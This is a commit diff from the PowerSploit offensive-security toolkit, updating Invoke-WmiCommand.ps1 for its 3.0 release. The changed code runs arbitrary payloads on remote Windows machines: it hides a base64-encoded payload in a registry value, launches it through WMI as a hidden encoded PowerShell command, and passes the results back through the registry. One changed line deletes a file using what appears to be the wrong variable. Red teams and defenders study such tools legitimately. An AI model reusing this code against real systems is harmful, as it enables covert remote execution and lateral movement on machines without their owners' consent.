diff options
| author | PowerShellMafia <PowerShellMafia@users.noreply.github.com> | 2015-12-18 16:33:59 -0800 |
|---|---|---|
| committer | PowerShellMafia <PowerShellMafia@users.noreply.github.com> | 2015-12-18 16:33:59 -0800 |
| commit | 9e771d15bf19ab3c2ac196393c088ecdab6c9a73 (patch) | |
| tree | 58927893ecb9289ad1de64d3a67eb58d00e4b762 /CodeExecution/Invoke-WmiCommand.ps1 | |
| parent | 9f78286ea7b0ec65d2aa09893a076864dd8d14e9 (diff) | |
| parent | 9f183e36518176c4299eed5c68b7deac7f4e8025 (diff) | |
| download | PowerSploit-3.0.0.tar.gz PowerSploit-3.0.0.zip | |
Merge pull request #102 from PowerShellMafia/devv3.0.0
Merge 3.0 release changes
Diffstat (limited to 'CodeExecution/Invoke-WmiCommand.ps1')
| -rw-r--r-- | CodeExecution/Invoke-WmiCommand.ps1 | 45 |
1 files changed, 35 insertions, 10 deletions
diff --git a/CodeExecution/Invoke-WmiCommand.ps1 b/CodeExecution/Invoke-WmiCommand.ps1 index 6ee1e15..0c06424 100644 --- a/CodeExecution/Invoke-WmiCommand.ps1 +++ b/CodeExecution/Invoke-WmiCommand.ps1 @@ -1,5 +1,3 @@ -#Requires -Version 2 - function Invoke-WmiCommand { <# .SYNOPSIS @@ -185,7 +183,7 @@ the output of your payload back. :P [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] - $Credential, + $Credential = [Management.Automation.PSCredential]::Empty, [Management.ImpersonationLevel] $Impersonation, @@ -209,6 +207,8 @@ the output of your payload back. :P 'HKEY_CURRENT_CONFIG' { $Hive = 2147483653 } } + $HKEY_LOCAL_MACHINE = 2147483650 + $WmiMethodArgs = @{} # If additional WMI cmdlet properties were provided, proxy them to Invoke-WmiMethod @@ -253,6 +253,18 @@ the output of your payload back. :P throw "[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand." } + $PSSettingsPath = 'SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' + $PSPathValueName = 'Path' + + $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKEY_LOCAL_MACHINE, $PSSettingsPath, $PSPathValueName + + if ($Result.ReturnValue -ne 0) { + throw "[$Computer] Unable to obtain powershell.exe path from the following registry value: HKEY_LOCAL_MACHINE\$PSSettingsPath\$PSPathValueName" + } + + $PowerShellPath = $Result.sValue + Write-Verbose "[$Computer] Full PowerShell path: $PowerShellPath" + $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload)) Write-Verbose "[$Computer] Storing the payload into the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName" @@ -282,18 +294,25 @@ the output of your payload back. :P if (($Result.ReturnValue -eq 0) -and ($Result.sValue)) { $Payload = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Result.sValue)) - $SerilizedPayloadResult = Invoke-Expression ($Payload) | % { - [Management.Automation.PSSerializer]::Serialize($_, 4) - } + $TempSerializedResultPath = [IO.Path]::GetTempFileName() + + $PayloadResult = Invoke-Expression ($Payload) + + Export-Clixml -InputObject $PayloadResult -Path $TempSerializedResultPath + + $SerilizedPayloadText = [IO.File]::ReadAllText($TempSerializedResultPath) + + $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadText, $RegistryResultValueName + + Remove-Item -Path $SerilizedPayloadResult -Force - $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadResult, $RegistryResultValueName $null = Invoke-WmiMethod @WmiMethodArgs -Name 'DeleteValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryPayloadValueName } } $Base64Payload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($RemotePayloadRunner)) - $Cmdline = "powershell -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload" + $Cmdline = "$PowerShellPath -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload" # Execute the payload runner on the remote system $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\cimv2' -Class 'Win32_Process' -Name 'Create' -ArgumentList $Cmdline @@ -301,7 +320,7 @@ the output of your payload back. :P Start-Sleep -Seconds 5 if ($Result.ReturnValue -ne 0) { - throw "[$Computer] Unable execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName" + throw "[$Computer] Unable to execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName" } Write-Verbose "[$Computer] Payload successfully executed from: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName" @@ -315,7 +334,13 @@ the output of your payload back. :P Write-Verbose "[$Computer] Payload results successfully retrieved from: $RegistryHive\$RegistryKeyPath\$RegistryResultValueName" $SerilizedPayloadResult = $Result.sValue - $PayloadResult = [Management.Automation.PSSerializer]::Deserialize($SerilizedPayloadResult) + + $TempSerializedResultPath = [IO.Path]::GetTempFileName() + + Out-File -InputObject $SerilizedPayloadResult -FilePath $TempSerializedResultPath + $PayloadResult = Import-Clixml -Path $TempSerializedResultPath + + Remove-Item -Path $TempSerializedResultPath $FinalResult = New-Object PSObject -Property @{ PSComputerName = $Computer |